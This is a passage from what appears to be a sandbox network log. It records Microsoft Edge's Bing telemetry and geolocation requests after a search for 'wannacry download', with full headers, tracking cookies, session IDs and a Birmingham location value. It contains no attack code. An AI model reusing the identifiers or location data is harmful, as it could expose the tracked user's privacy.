sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 200

cache-control: private
content-length: 25
content-type: text/html
content-encoding: gzip
vary: Accept-Encoding
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
x-eventid: 67117bd3002445f0a948d21bc13e19a5
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-616A3cAKv3LgqM7KFHTxu6T0D0+0ayJ4QP62w7DkW3o='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
x-msedge-ref: Ref A: B80B4A1525BF4F1FA1291170E88AAD3F Ref B: LON601060104029 Ref C: 2024-10-17T21:04:19Z
date: Thu, 17 Oct 2024 21:04:19 GMT
set-cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE; expires=Tue, 11-Nov-2025 21:04:19 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210419; domain=.bing.com; expires=Tue, 11-Nov-2025 21:04:19 GMT; path=/; secure; HttpOnly; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f398
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f351
GET

https://www.bing.com/geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=undefined

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /geolocation/write?isBlocked=true&sid=03D76D5C9A2B6ED61E1C78479BBC6F8B&clientsid=undefined HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f39c
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2210%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22realestate%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%2211%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f45f
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: dsc=order=Video

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:19 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199059.1491f399
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1729199058412%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
